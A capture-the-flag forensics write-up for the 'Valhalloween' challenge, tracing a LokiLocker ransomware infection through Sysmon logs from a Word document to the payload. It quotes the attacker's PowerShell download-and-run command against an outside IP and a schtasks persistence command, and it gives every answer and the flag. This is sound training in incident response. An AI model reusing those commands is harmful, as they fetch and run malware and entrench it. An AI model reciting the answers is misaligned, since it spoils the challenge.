Valhalloween

Challenge

  • CTF: Hack The Boo 2023
  • Name: Valhalloween
  • Category: Forensics
  • Difficulty: Medium
  • Points: 1000
  • Description: As I was walking the neighbor’s streets for some Trick-or-Treat, a strange man approached me, saying he was dressed as “The God of Mischief!”. He handed me some candy and disappeared. Among the candy bars was a USB in disguise, and when I plugged it into my computer, all my files were corrupted! First, spawn the haunted Docker instance and connect to it! Dig through the horrors that lie in the given Logs and answer whatever questions are asked of you!
  • Objective: Microsoft Event Log SysLog Incident Response

Files

Download: forensics_valhalloween.zip

Writeup

The challenge contains 366 .evtx files, which are Windows Event Log files. The Sysmon log, Microsoft-Windows-Sysmon%4Operational.evtx, can be converted to XML for easier analysis as shown below:

evtxexport Microsoft-Windows-Sysmon%4Operational.evtx -f xml > sysmon.xml

After spinning up the Docker instance, you can connect to it via netcat and are prompted with a series of questions to answer. Answering the last question provides the flag that completes the challenge.

Q1: What are the IP address and port of the server from which the malicious actors downloaded the ransomware? (for example: 98.76.54.32:443)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the malware being downloaded from http://103.162.14.116:8888/mscalc.exe by a command that was run from a Microsoft Word process.

<TimeCreated SystemTime="2023-09-20T03:03:22.905760700Z"/>
<EventRecordID>3837</EventRecordID>
..[snip]..
<Data Name="CommandLine">c:\\microsoft\\office\\word\\document\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c powershell.exe (new-object system.net.webclient).downloadfile('http://103.162.14.116:8888/mscalc.exe','%%temp%%\mscalc.exe');start-process '%%temp%%\mscalc.exe'</Data>
..[snip]..
<Data Name="ParentCommandLine">"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o ""</Data>

> 103.162.14.116:8888
[+] Correct!

Q2: According to the sysmon logs, what is the MD5 hash of the ransomware? (for example: 6ab0e507bcc2fad463959aa8be2d782f)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the payload mscalc.exe being run, and the Sysmon log captured its MD5 hash.

<TimeCreated SystemTime="2023-09-20T03:03:24.8085843Z" />
<EventRecordID>3844</EventRecordID>
..[snip]..
<Data Name="Image">C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe</Data>
<Data Name="CommandLine">"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe"
..[snip]..
<Data Name="Hashes">MD5=B94F3FF666D9781CB69088658CD53772</Data>

> B94F3FF666D9781CB69088658CD53772
[+] Correct!

Q3: Based on the hash found, determine the family label of the ransomware in the wild from online reports such as Virus Total, Hybrid Analysis, etc. (for example: wannacry)

Searching for the MD5 hash on VirusTotal led to a threat label of ransomware.lokilocker/msil.

> lokilocker
[+] Correct!

Q4: What is the name of the task scheduled by the ransomware? (for example: WindowsUpdater)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see a scheduled task called “Loki” being created for persistence. You can also see this same process in the behavioral statistics on VirusTotal.

<Data Name="CommandLine">"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\HoaGay\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F</Data>

> Loki
[+] Correct!

Q5: What are the parent process name and ID of the ransomware process? (for example: svchost.exe_4953)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see that the parent process is powershell.exe with process ID 3856.

<TimeCreated SystemTime="2023-09-20T03:03:24.8085843Z" />
<EventRecordID>3844</EventRecordID>
..[snip]..
<Data Name="Image">C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe</Data>
<Data Name="CommandLine">"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe"
..[snip]..
<Data Name="Hashes">MD5=B94F3FF666D9781CB69088658CD53772</Data>
<Data Name="ParentProcessGuid">{335CB4AA-60FB-650A-0001-000000000D00}</Data>
<Data Name="ParentProcessId">3856</Data>
<Data Name="ParentImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="ParentCommandLine">powershell.exe  (new-object system.net.webclient).downloadfile('http://103.162.14.116:8888/mscalc.exe','C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe');start-process 'C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe'</Data>

> powershell.exe_3856
[+] Correct!

Q6: Following the PPID, provide the file path of the initial stage in the infection chain. (for example: D:\Data\KCorp\FirstStage.pdf)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see that the original file is Unexpe.docx, which was opened in a Microsoft Word process.

<TimeCreated SystemTime="2023-09-20T03:03:20.2610014Z" />
<EventRecordID>3802</EventRecordID>
..[snip]..
<Data Name="Image">C:\Program Files\Microsoft Office\Office15\WINWORD.EXE</Data>
<Data Name="FileVersion">15.0.4420.1017</Data>
<Data Name="Description">Microsoft Word</Data>
<Data Name="Product">Microsoft Office 2013</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">WinWord.exe</Data>
<Data Name="CommandLine">"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o ""</Data>
<Data Name="CurrentDirectory">C:\Users\HoaGay\Documents\Subjects\</Data>
<Data Name="User">DESKTOP-V0F35DT\HoaGay</Data>

> C:\Users\HoaGay\Documents\Subjects\Unexpe.docx
[+] Correct!

Q7: When was the first file in the infection chain opened (in UTC)? (for example: 1975-04-30_12:34:56)

As shown above in Q6, the SystemTime recorded for that event was 2023-09-20T03:03:20.2610014Z.

> 2023-09-20_03:03:20
[+] Correct!
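
The parent lookups done by hand in Q5 to Q7 can be scripted. The following is an added example, not part of the original writeup: it indexes Sysmon Event ID 1 records by ProcessGuid and walks ParentProcessGuid rather than the PID, because PIDs can be reused while the GUID is unique per process. Assumptions: the export is a sequence of `<Event>` elements without a single root, and the sample is constructed (image paths, PID 3856, the PowerShell GUID and three timestamps are from the writeup; the other GUIDs, PIDs, the PowerShell timestamp and the cmd.exe to powershell.exe link are placeholders).

```python
import re
import xml.etree.ElementTree as ET
NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
FIELDS = ("ProcessGuid", "ProcessId", "Image", "CommandLine", "ParentProcessGuid")

def parse_process_events(text):
    """Index Sysmon Event ID 1 (process creation) records by ProcessGuid."""
    procs = {}
    # Assumption: the export is a run of <Event> elements with no single root.
    for blob in re.findall(r"<Event\b.*?</Event>", text, re.S):
        ev = ET.fromstring(blob)
        if ev.findtext(f"{NS}System/{NS}EventID") != "1":
            continue
        rec = {d.get("Name"): d.text or "" for d in ev.iter(f"{NS}Data")}
        rec["SystemTime"] = ev.find(f"{NS}System/{NS}TimeCreated").get("SystemTime")
        procs[rec["ProcessGuid"]] = rec
    return procs

def ancestry(procs, image_suffix):
    """Follow ParentProcessGuid from a matching image up to the oldest logged ancestor."""
    suffix = image_suffix.lower()
    node = next((p for p in procs.values() if p["Image"].lower().endswith(suffix)), None)
    chain, seen = [], set()
    while node and node["ProcessGuid"] not in seen:  # stop on gaps or loops
        seen.add(node["ProcessGuid"])
        chain.append(node)
        node = procs.get(node["ParentProcessGuid"])
    return chain

def _ev(time, *values):  # builds one constructed process-creation record
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in zip(FIELDS, values))
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>1</EventID><TimeCreated '
            f'SystemTime="{time}"/></System><EventData>{data}</EventData></Event>\n')

# Constructed sample: writeup values where the page gives them, placeholders elsewhere.
PS = "{335CB4AA-60FB-650A-0001-000000000D00}"
SAMPLE = "tool banner (constructed)\n" + "".join([
    _ev("2023-09-20T03:03:20.2610014Z", "{GUID-WORD}", "1001",
        r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
        r'WINWORD.EXE /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx"', "{GUID-SHELL}"),
    _ev("2023-09-20T03:03:22.905760700Z", "{GUID-CMD}", "1002",
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell.exe ...", "{GUID-WORD}"),
    _ev("2023-09-20T03:03:23.000000000Z", PS, "3856",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe ...", "{GUID-CMD}"),
    _ev("2023-09-20T03:03:24.8085843Z", "{GUID-MSCALC}", "1004",
        r"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe", "mscalc.exe", PS),
])
for p in ancestry(parse_process_events(SAMPLE), r"\mscalc.exe"):
    print(p["SystemTime"], p["ProcessId"], p["Image"])
```

The last entry of the returned chain is the oldest logged ancestor, which gives the first-stage command line and its timestamp in one pass.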

[+] Here is the flag: HTB{N0n3_c4n_ru1n_th3_H@ll0w33N_Sp1r1t}

Flag: HTB{N0n3_c4n_ru1n_th3_H@ll0w33N_Sp1r1t}

This post is licensed under CC BY 4.0 by the author.